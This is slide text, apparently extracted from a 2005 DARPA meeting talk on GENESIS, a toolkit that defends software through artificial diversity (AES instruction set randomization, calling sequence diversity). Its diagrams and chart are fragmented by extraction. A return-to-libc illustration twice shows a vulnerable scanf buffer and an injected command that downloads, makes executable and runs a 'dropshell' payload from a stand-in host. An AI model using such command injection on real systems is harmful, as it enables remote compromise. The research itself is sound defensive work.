G E N E S I S : A Framework For Achieving Component Diversity

GENESIS: A Framework For Achieving Component Diversity

John C. Knight, Jack W. Davidson, David Evans, Anh Nguyen-TuongUniversity of Virginia

Chenxi WangCarnegie Mellon University

University of Virginia www.cs.virginia.edu/genesis

DARPA SRS July 2005 PI Meeting 2

Project Overview

Existing practice: Monoculture

Technical objectives: Exploit artificial diversity

to break existing software monoculture

Technical approach: Artificial diversity at

compile, link, load, and execution times

Combinations selectable with toolkit

Source Code

Object Code

Executable

Compile

Link

Load

Run

Diversity Transforms



Major risks and planned mitigation: Susceptibility to new class of attacks Deployment issues Ad hoc evaluation

Quantitative metrics: Fraction of variants that remain susceptible to

attack after transformation Expected major achievements:

Significant reduction in susceptibility Task milestones (schedule 12/31/05):

Complete diversity toolkit Evaluate complete spectrum of diversity

techniques

Project Overview



Genesis Diversity Toolkit

DiversitySpecification

Application Variants

Genesis Execution Environment

Server Farm

Front End(lcc)

Front End(Phoenix)

Front End(EDG)

Diversity Generator

Backend(VPO)

Linker(Diablo)

RTLs Object Files

FECSD

SSR

RuntimeLibraries

SourceFiles

AES/XOR

AES/XORIT

CSD

IT

StrataLibraries

Genesis Diversity Generator




Front End(lcc)

Front End(Phoenix)

Front End(EDG)

Diversity Generator

Backend(VPO)

Linker(Diablo)

RTLs Object Files

Executable

FECSD

SSR

RuntimeLibraries

SourceFiles

AES/XOR

AES/XORIT


CSD

IT

StrataLibraries



Strong ISR using AES and IT

Randomized Instruction Set Emulation, E. G. Barrantes, D. H. Ackley, S. Forrest, and D. Stefanovi, ACM Transactions on Information System Security. 8(1), pp. 3-40.

Current implementations of ISR execute injected code Random instruction sequences are executed Rely on probabilistic arguments that the random sequences

will crash harmlessly Not realistic for critical embedded systems Recovery of application is difficult/impossible

Vulnerable to attack Where’s the FEEB?, Ana Sovarel and Dave Evans, USENIX

Security Conference, August 2005. Overhead issues (both space and time)




F: inst1inst2inst3bne L1inst5

L1: inst6...

Diablo tags and pads

instructions

3B0x40

0x41

0x42

Address

0x43

0x44

0x45

0x46

0x47

0x48

23

F4

71

3A

21

0x49

0x4A

0x4B

0x4C

0x4D

inst1

25

DB

3C

bne

4E

inst2

49

57

0x4E

0x4F

7E

33

67

inst3

...

inst4

inst5

inst6

0x50

3B

0x40

0x41

0x42

Address

0x43

0x44

0x45

0x46

0x47

0x48

23

F4

71

3A

21

0x49

0x4A

0x4B

0x4C

0x4D

inst1

25

DB

3C

bne

50

inst2

49

57

0x4E

0x4F

7E

nop

inst3

33

inst4

inst5

inst6

0x50

67

...

Diablo encrypts with AES

128-bit block

tag

tag

tag

tag

2A

0x40

0x41

0x42

Address

0x43

0x44

0x45

0x46

0x47

0x48

37

FB

23

8C

67

0x49

0x4A

0x4B

0x4C

0x4D

27

54

BF

99

12

49

57

0x4E

0x4F

7E

45

33

0x50

67

...

45

37

06

67




Diablo

M1.o

M2.o

Application binary modules

Secure key

0f e3ac82…34b2d712652f…

L2: 3782a31423ba21d3d3d2b14e…ef 9d

L4: 3d3ff 32e…

Context Switch

Fetch

Decode

Translate

New PC

Finished?

No

Strata Virtual Machine

Yes

Context Capture

Cached?

Yes

New Fragment

Next PC

Encrypted Application

glibc.a

crt0.o

Runtime libraries modules

Link time Run time

Decrypt.Engine

Decrypt block and check tagIf tag invalid, do not execute fragment.



CSD: Calling sequence diversity

Compile-time/runtime technique to create a software population with many different calling sequences

Effective defense against “return-to-libc” attacks (also known as arc injection, Pincus and Baker, IEEE Security and Privacy, 2(4), pp. 20-27) Return-to-libc does not require injecting code into

the application ISR is not an effective defense against return-to-

libc type attacks



Return-to-libc attack

void bar(int arg1, int arg2) {char buffer[100];…scanf(“%s”, buffer)….

}

…arg2arg1

return addrSaved ebp

buffer

Runtime Stack

…arg2

Bad argsystem

Saved ebpbuffer

Runtime StackBuffer O

verflow

wget: http://www.example.com/dropshell ;chmod +x dropshell ; ./dropshell



void bar() {…key=Keygen(key, &bar, &foo);foo(arg1, arg2);key=Keygen(key, &foo, &bar);…key=Keygen(key, &bar, &baz);baz(arg);key=Keygen(key, &baz, &bar);…

}void foo(int a1, int a2) {

Keycheck(key);…Keycheck(key);

}





Calls to Keygen and Keycheck routines are inserted by the compiler front end (lcc, edg, Phoenix)

At runtime: Strata generates a key for each function

(stored in protected region) Replaces calls with inline code to generate

proper key or check that the key has the proper value



Return-to-libc attack

void bad(int arg1, int arg2) {char buffer[100];…scanf(“%s”, buffer)….

}

…arg2arg1

return addrSaved ebp

buffer

Runtime Stack

…arg2

Bad argsystem

Saved ebpbuffer

Runtime StackBuffer O

verflow

wget: http://www.example.com/dropshell ;chmod +x dropshell ; ./dropshell



Genesis Diversity Toolkit




Server Farm

Front End(lcc)

Front End(Phoenix)

Front End(EDG)

Diversity Generator

Backend(VPO)

Linker(Diablo)

RTLs Object Files

FECSD

SSR

RuntimeLibraries

SourceFiles

AES/XOR

AES/XORIT

CSD

IT

StrataLibraries




Toolkit Execution Environment




Server Farm

App

licat

ion

Var

iant

s fr

om

Div

ersi

ty G

ener

ator



Performance

Apache Performance(w/fast returns, w/IBTC)

0

0.2

0.4

0.6

0.8

1

1.2

1.4

csd=

0.pr

efix

=0.a

es=0

.xor

=0.s

sr=0

csd=

0.pr

efix

=0.a

es=0

.xor

=0.s

sr=6

4

csd=

0.pr

efix

=0.a

es=0

.xor

=1.s

sr=0

csd=

0.pr

efix

=0.a

es=0

.xor

=1.s

sr=6

4

csd=

0.pr

efix

=0.a

es=1

.xor

=0.s

sr=0

csd=

0.pr

efix

=0.a

es=1

.xor

=0.s

sr=6

4

csd=

0.pr

efix

=1.a

es=0

.xor

=0.s

sr=0

csd=

0.pr

efix

=1.a

es=0

.xor

=0.s

sr=6

4

csd=

0.pr

efix

=1.a

es=0

.xor

=1.s

sr=0

csd=

0.pr

efix

=1.a

es=0

.xor

=1.s

sr=6

4

csd=

0.pr

efix

=1.a

es=1

.xor

=0.s

sr=0

csd=

0.pr

efix

=1.a

es=1

.xor

=0.s

sr=6

4

csd=

1.pr

efix

=0.a

es=0

.xor

=0.s

sr=0

csd=

1.pr

efix

=0.a

es=0

.xor

=0.s

sr=6

4

csd=

1.pr

efix

=0.a

es=0

.xor

=1.s

sr=0

csd=

1.pr

efix

=0.a

es=0

.xor

=1.s

sr=6

4

csd=

1.pr

efix

=0.a

es=1

.xor

=0.s

sr=0

csd=

1.pr

efix

=0.a

es=1

.xor

=0.s

sr=6

4

csd=

1.pr

efix

=1.a

es=0

.xor

=0.s

sr=0

csd=

1.pr

efix

=1.a

es=0

.xor

=0.s

sr=6

4

csd=

1.pr

efix

=1.a

es=0

.xor

=1.s

sr=0

csd=

1.pr

efix

=1.a

es=0

.xor

=1.s

sr=6

4

csd=

1.pr

efix

=1.a

es=1

.xor

=0.s

sr=0

csd=

1.pr

efix

=1.a

es=1

.xor

=0.s

sr=6

4no

str

ata

Configuration

Slo

wd

ow

n

No Checking

Checking



Progress Towards Metric

Diversity toolkit facilitates: Creation of large number of variants Operating, attacking & monitoring variants

Large numbers of variants of Apache created and tested, success rate very high

Disclaimers: Only one application Synthetic but realistic vulnerabilities No statistical significance

G E N E S I S : A Framework For Achieving Component Diversity

Documents

Transcript of G E N E S I S : A Framework For Achieving Component Diversity